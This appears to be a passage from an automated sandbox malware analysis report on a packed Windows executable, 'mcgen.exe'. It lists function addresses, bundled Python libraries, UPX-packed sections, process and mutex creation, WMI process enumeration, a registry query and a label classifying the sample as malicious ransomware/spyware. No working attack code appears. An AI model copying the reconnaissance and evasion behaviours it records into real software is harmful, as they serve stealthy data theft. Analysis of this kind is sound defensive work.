              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 62_2_00007FFD32D03B5A62_2_00007FFD32D03B5A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 62_2_00007FFD32D03CFA62_2_00007FFD32D03CFA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 62_2_00007FFD32D0441D62_2_00007FFD32D0441D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 62_2_00007FFD32D0264D62_2_00007FFD32D0264D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 62_2_00007FFD32D04C3D62_2_00007FFD32D04C3D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 62_2_00007FFD32D053F262_2_00007FFD32D053F2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 62_2_00007FFD32D051F262_2_00007FFD32D051F2
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CDB540103_2_00007FF695CDB540
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CD1884103_2_00007FF695CD1884
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CD82F0103_2_00007FF695CD82F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CE1180103_2_00007FF695CE1180
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CE54C0103_2_00007FF695CE54C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CFAE10103_2_00007FF695CFAE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D07B24103_2_00007FF695D07B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CE0A2C103_2_00007FF695CE0A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CDABA0103_2_00007FF695CDABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D12700103_2_00007FF695D12700
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D0A710103_2_00007FF695D0A710
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D10710103_2_00007FF695D10710
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CE86C4103_2_00007FF695CE86C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D386D4103_2_00007FF695D386D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D27660103_2_00007FF695D27660
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D065FC103_2_00007FF695D065FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D2260C103_2_00007FF695D2260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D0F59C103_2_00007FF695D0F59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CFF5B0103_2_00007FF695CFF5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CE8598103_2_00007FF695CE8598
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D0D91C103_2_00007FF695D0D91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D00904103_2_00007FF695D00904
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D1190C103_2_00007FF695D1190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D038E8103_2_00007FF695D038E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CE2890103_2_00007FF695CE2890
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CD8884103_2_00007FF695CD8884
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D218A8103_2_00007FF695D218A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CE17C8103_2_00007FF695CE17C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CF67E0103_2_00007FF695CF67E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D2832C103_2_00007FF695D2832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D21314103_2_00007FF695D21314
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CED2C0103_2_00007FF695CED2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CD42E0103_2_00007FF695CD42E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D102A4103_2_00007FF695D102A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CDF24C103_2_00007FF695CDF24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CF7244103_2_00007FF695CF7244
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D22268103_2_00007FF695D22268
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CEE21C103_2_00007FF695CEE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D341CC103_2_00007FF695D341CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D181CC103_2_00007FF695D181CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D12164103_2_00007FF695D12164
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CDA504103_2_00007FF695CDA504
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D15468103_2_00007FF695D15468
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CFD458103_2_00007FF695CFD458
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CFC3E0103_2_00007FF695CFC3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D00374103_2_00007FF695D00374
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CE2360103_2_00007FF695CE2360
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CD9EFC103_2_00007FF695CD9EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D0AF0C103_2_00007FF695D0AF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D1EEA4103_2_00007FF695D1EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CDCE84103_2_00007FF695CDCE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D2FE74103_2_00007FF695D2FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CE8E68103_2_00007FF695CE8E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D1AE50103_2_00007FF695D1AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CDEE08103_2_00007FF695CDEE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CE1E04103_2_00007FF695CE1E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D21DCC103_2_00007FF695D21DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D19D74103_2_00007FF695D19D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CF0104103_2_00007FF695CF0104
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D300F0103_2_00007FF695D300F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D08040103_2_00007FF695D08040
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D00074103_2_00007FF695D00074
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CFC05C103_2_00007FF695CFC05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CE3030103_2_00007FF695CE3030
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D0C00C103_2_00007FF695D0C00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D3DFD8103_2_00007FF695D3DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D14FE8103_2_00007FF695D14FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D3AF90103_2_00007FF695D3AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D05F4C103_2_00007FF695D05F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CDCB14103_2_00007FF695CDCB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D3AAC0103_2_00007FF695D3AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D0FA6C103_2_00007FF695D0FA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D15A70103_2_00007FF695D15A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D169FD103_2_00007FF695D169FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CD49B8103_2_00007FF695CD49B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CFD97C103_2_00007FF695CFD97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CF9D0C103_2_00007FF695CF9D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CDDD04103_2_00007FF695CDDD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D00D20103_2_00007FF695D00D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D26D0C103_2_00007FF695D26D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D15C8C103_2_00007FF695D15C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CE8C30103_2_00007FF695CE8C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D29B98103_2_00007FF695D29B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D14B38103_2_00007FF695D14B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: String function: 00007FF695CE8444 appears 48 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: String function: 00007FF695D149F4 appears 53 times
              Source: C:\Users\user\Desktop\mcgen.exeCode function: String function: 00007FFDA33BD32F appears 77 times
              Source: C:\Users\user\Desktop\mcgen.exeCode function: String function: 00007FFD940DA510 appears 42 times
              Source: C:\Users\user\Desktop\mcgen.exeCode function: String function: 00007FF6B9F12710 appears 68 times
              Source: C:\Users\user\Desktop\mcgen.exeCode function: String function: 00007FFD940D9350 appears 37 times
              Source: C:\Users\user\Desktop\mcgen.exeCode function: String function: 00007FFDA3341325 appears 93 times
              Source: C:\Users\user\Desktop\mcgen.exeCode function: String function: 00007FFDA33BD341 appears 340 times
              Source: mcgen.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: mcgen.exeBinary or memory string: OriginalFilename vs mcgen.exe
              Source: mcgen.exe, 00000000.00000003.2125083047.0000024512160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000000.00000003.2121600244.0000024512160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs mcgen.exe
              Source: mcgen.exe, 00000000.00000003.2121226107.0000024512160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000000.00000003.2121139927.0000024512160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000000.00000003.2124808250.0000024512160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs mcgen.exe
              Source: mcgen.exe, 00000000.00000003.2121508208.0000024512160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCheckNetIsolation.exej% vs mcgen.exe
              Source: mcgen.exe, 00000000.00000003.2121004695.0000024512160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000000.00000003.2124645365.0000024512160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000000.00000003.2121415784.0000024512160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000000.00000003.2120892411.0000024512160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000000.00000003.2121331109.0000024512160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000000.00000003.2120799474.0000024512160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000000.00000003.2120621510.0000024512160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs mcgen.exe
              Source: mcgen.exeBinary or memory string: OriginalFilename vs mcgen.exe
              Source: mcgen.exe, 00000002.00000000.2125704331.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCheckNetIsolation.exej% vs mcgen.exe
              Source: mcgen.exe, 00000002.00000002.2536310062.00007FFD948A7000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython313.dll. vs mcgen.exe
              Source: mcgen.exe, 00000002.00000002.2538045588.00007FFDA3A93000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000002.00000002.2537297636.00007FFDA3474000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000002.00000002.2533464335.00007FFD93B82000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000002.00000002.2538520502.00007FFDA4178000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000002.00000002.2538326175.00007FFDA3AF8000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000002.00000002.2539577010.00007FFDAC06A000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs mcgen.exe
              Source: mcgen.exe, 00000002.00000002.2536779033.00007FFDA3409000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs mcgen.exe
              Source: mcgen.exe, 00000002.00000002.2538896245.00007FFDA549C000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000002.00000002.2537814722.00007FFDA3516000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs mcgen.exe
              Source: mcgen.exe, 00000002.00000002.2538708212.00007FFDA4DAC000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000002.00000002.2537529762.00007FFDA34AA000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs mcgen.exe
              Source: mcgen.exe, 00000002.00000002.2534814877.00007FFD9409A000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs mcgen.exe
              Source: mcgen.exe, 00000002.00000002.2537063679.00007FFDA3442000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs mcgen.exe
              Source: mcgen.exeBinary or memory string: OriginalFilenameCheckNetIsolation.exej% vs mcgen.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
              Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
              Source: python313.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9994215874784359
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9980279432552503
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9925709355828221
              Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@200/57@4/2
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CECAFC GetLastError,FormatMessageW,103_2_00007FF695CECAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D1B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,103_2_00007FF695D1B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CEEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,103_2_00007FF695CEEF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CF3144 GetDiskFreeSpaceExW,103_2_00007FF695CF3144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1444:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3840:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:364:120:WilError_03
              Source: C:\Users\user\Desktop\mcgen.exeMutant created: \Sessions\1\BaseNamedObjects\L
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1212:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2016:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2168:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2536:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3816:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1600:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2404:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6312:120:WilError_03
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122Jump to behavior
              Source: mcgen.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\mcgen.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: mcgen.exe, mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: mcgen.exe, mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: mcgen.exe, mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
